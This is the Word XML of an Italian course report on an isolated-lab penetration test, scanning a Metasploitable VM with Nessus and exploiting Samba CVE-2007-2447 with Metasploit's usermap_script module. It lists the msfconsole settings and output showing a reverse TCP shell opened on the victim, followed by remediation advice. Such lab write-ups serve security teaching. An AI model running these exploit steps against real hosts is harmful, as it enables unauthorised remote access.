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6E2B8B" w:sz="12" w:space="10"/>
        </w:pBdr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="6E2B8B"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">EPICODE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="300"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t xml:space="preserve">Relazione di Penetration Testing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Exploit di Metasploitable con Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="600"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="6E2B8B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Build Week 2 — Traccia Giorno 4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Corso: Cybersecurity &amp; Ethical Hacking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Modulo: Penetration Testing with Metasploit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Data: 27 luglio 2026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1. Informazioni sul documento</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="8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6000"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Titolo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Sfruttamento del servizio Samba su macchina Metasploitable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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 di attività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Vulnerability Assessment + Exploitation (laboratorio didattico)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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 di laboratorio isolata — VM Kali Linux (attaccante) e Metasploitable (vittima)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Strumenti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Tenable Nessus Essentials, Metasploit Framework v6.4.135-dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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interno / didattico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2. Sommario esecutivo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presente relazione documenta l'attività svolta nell'ambito della traccia del Giorno 4, che richiedeva di individuare e sfruttare un servizio vulnerabile in ascolto sulla macchina </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploitable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. L'attività si è articolata in tre fasi: una scansione delle vulnerabilità con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Nessus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, lo sfruttamento della vulnerabilità del servizio Samba sulla porta </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">445/TCP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> tramite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">MSFConsole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, e infine la verifica dell'accesso ottenuto mediante il comando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ifconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sulla macchina vittima.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L'attività si è conclusa con successo: è stata ottenuta una </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">command shell remota</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sulla macchina target, confermando la presenza di una vulnerabilità critica nel servizio Samba e la possibilità di eseguire codice arbitrario da remoto.</w:t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3. Scopo e obiettivi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Gli obiettivi definiti dalla traccia erano i seguenti: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Effettuare un Vulnerability Scanning (basic scan) con Nessus sulla macchina Metasploitable.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Sfruttare la vulnerabilità del servizio attivo sulla porta 445/TCP utilizzando MSFConsole.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Eseguire il comando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ifconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> una volta ottenuta la sessione, per verificare l'indirizzo di rete della macchina vittima.</w:t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4. Ambiente di laboratorio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prova è stata condotta in una rete virtuale isolata composta da due macchine, secondo i parametri indicati nella traccia:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="8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5400"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="6E2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400"/>
            <w:shd w:fill="6E2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2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IP Kali Linux (attaccante)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192.168.50.100</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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IP Metasploitable (vittima)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192.168.50.150</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Servizio bersaglio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Samba (SMB/CIFS) — porta 445/TCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>
            <w:shd w:fill="F2F2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Listen port (payload)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5555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5. Metodologia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L'attività ha seguito un flusso di lavoro coerente con le fasi standard di un penetration test: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Scanning: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">identificazione dei servizi e delle vulnerabilità esposte tramite scanner automatico (Nessus).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Exploitation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">selezione e configurazione di un modulo di exploit su Metasploit per sfruttare la vulnerabilità individuata.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Post-exploitation (verifica): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">conferma dell'accesso alla macchina vittima tramite comandi di sistema all'interno della sessione ottenuta.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6. Fase 1 — Vulnerability Scanning con Nessus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È stata configurata una scansione di tipo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic Network Scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> con target l'indirizzo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.50.150</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. La scansione ha prodotto complessivamente 13 vulnerabilità, con in primo piano un finding di severità </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">HIGH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> relativo al servizio Samba (CVSS 7.5, famiglia General).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 — Risultati della scansione Nessus sulla macchina Metasploitable (192.168.50.150): 13 vulnerabilità rilevate, con finding Samba HIGH in evidenza.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">6.1 Dettaglio del finding principale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Il finding di severità più elevata corrisponde al plugin Nessus </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">#90509 — Samba Badlock Vulnerability</w:t>
      </w:r>
      <w:r>
        <w:rPr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 xml:space="preserve">CVE-2016-2118</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Lo scanner ha rilevato che la patch Badlock non è stata applicata sul server Samba. La vulnerabilità risiede nei protocolli SAM e LSAD su canali RPC e consente, a un attaccante in posizione man-in-the-middle, un downgrade del livello di autenticazione.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 — Dettaglio del plugin Nessus #90509 (Samba Badlock, CVE-2016-2118): descrizione, soluzione proposta e informazioni di rischio (CVSS v3.0 Base Score 7.5).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7. Fase 2 — Sfruttamento con MSFConsole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Confermata la presenza di un servizio Samba obsoleto e vulnerabile, si è proceduto allo sfruttamento pratico tramite Metasploit. Come indicato dal suggerimento della traccia, è stato ricercato e utilizzato il modulo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit/multi/samba/usermap_script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, che sfrutta la command injection nella funzione «username map script» di Samba (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2007-2447</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">7.1 Ricerca del modulo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msf &gt; search usermap_script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 — Ricerca del modulo di exploit tramite la keyword «usermap_script»; il modulo individuato ha rank «excellent».</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">7.2 Configurazione dei parametri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Il modulo è stato caricato e configurato con i parametri di laboratorio. Si segnala che la porta di destinazione predefinita del modulo è 139: è stata quindi impostata esplicitamente a 445, come richiesto dalla traccia.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use exploit/multi/samba/usermap_script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set RHOSTS 192.168.50.150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set RPORT 445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set LHOST 192.168.50.100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set LPORT 5555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4 — Visualizzazione delle opzioni del modulo e impostazione dei parametri RHOSTS, RPORT (445), LHOST e LPORT (5555).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8. Fase 3 — Esecuzione e verifica dell'accesso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L'esecuzione del comando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ha avviato l'handler reverse TCP e ha portato all'apertura di una command shell remota sulla macchina vittima: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[*] Started reverse TCP handler on 192.168.50.100:5555</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F5F3F8" w:val="clear"/>
        <w:spacing w:after="30" w:before="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="2A2A2A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Command shell session 1 opened (192.168.50.100:5555 -&gt; 192.168.50.150:37695)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All'interno della sessione è stato eseguito il comando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ifconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. L'output mostra l'interfaccia </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">eth0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> con indirizzo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">inet addr:192.168.50.150</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, confermando che la shell ottenuta è effettivamente in esecuzione sulla macchina Metasploitable e non sulla macchina attaccante.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5 — Esecuzione dell'exploit, apertura della sessione remota e output del comando ifconfig con l'indirizzo IP della vittima (192.168.50.150).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9. Riepilogo delle vulnerabilità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tabella seguente distingue la vulnerabilità rilevata dallo scanner e quella effettivamente sfruttata per ottenere l'accesso. Entrambe interessano il medesimo servizio (Samba) ma corrispondono a CVE differenti.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="8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2400"/>
        <w:gridCol w:w="1400"/>
        <w:gridCol w:w="2600"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:shd w:fill="6E2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Vulnerabilità</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2400"/>
            <w:shd w:fill="6E2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1400"/>
            <w:shd w:fill="6E2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Severità</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>
            <w:shd w:fill="6E2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Ruolo nell'attività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Samba Badlock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CVE-2016-2118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HIGH (7.5)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Rilevata da Nessus — evidenzia servizio Samba non aggiornato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Samba «username map script» Command Execution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CVE-2007-2447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Sfruttata con Metasploit — accesso remoto (command shell)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Nota: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">il basic scan documenta lo stato vulnerabile e obsoleto del servizio Samba (tra cui la falla Badlock), mentre lo sfruttamento pratico è stato realizzato tramite la command injection «usermap_script», che apre direttamente una command shell Unix sulla macchina vittima.</w:t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10. Raccomandazioni e remediation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Per mitigare le vulnerabilità individuate si raccomandano i seguenti interventi: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Aggiornare Samba</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a una versione supportata e priva delle vulnerabilità note (per Badlock: 4.2.11 / 4.3.8 / 4.4.2 o successive).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Disabilitare o rimuovere</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> la direttiva «username map script» dalla configurazione di Samba, responsabile della command injection.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Limitare l'esposizione di rete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dei servizi SMB/CIFS (porte 139/445) tramite segmentazione e regole firewall, evitando l'accesso da reti non fidate.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Applicare un processo di patch management</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> periodico e ripetere le scansioni di vulnerabilità per verificare l'efficacia delle correzioni.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="6E2B8B"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">11. Conclusioni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Tutti gli obiettivi della traccia sono stati raggiunti con successo. La scansione con Nessus ha identificato il servizio Samba come vulnerabile; lo sfruttamento con Metasploit sulla porta 445/TCP ha permesso di ottenere una command shell remota; e la verifica tramite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ifconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ha confermato l'accesso alla macchina vittima (192.168.50.150). L'attività dimostra come un servizio non aggiornato possa condurre alla compromissione completa di un host, e ribadisce l'importanza di un'adeguata gestione delle patch e della riduzione della superficie di attacco.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999999"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Relazione Esercizio BW II — Cybersecurity &amp; Ethical Hacking   |   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di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E2B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1280c552547b353bcc36c6de74e3b0dc1d09ef.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/598c9bbbc887e571e9625ff0929be9aa6bf88f07.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/1b39475eee409f4749a185550f8356457aa6565a.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/0b70753c74c55fb8fb1525da5d3c4496e4929683.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/c30edcb16c6b330a8e52777e1ac378af9759fbd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2026-07-27T09:55:48.342Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-27T09:55:48.356Z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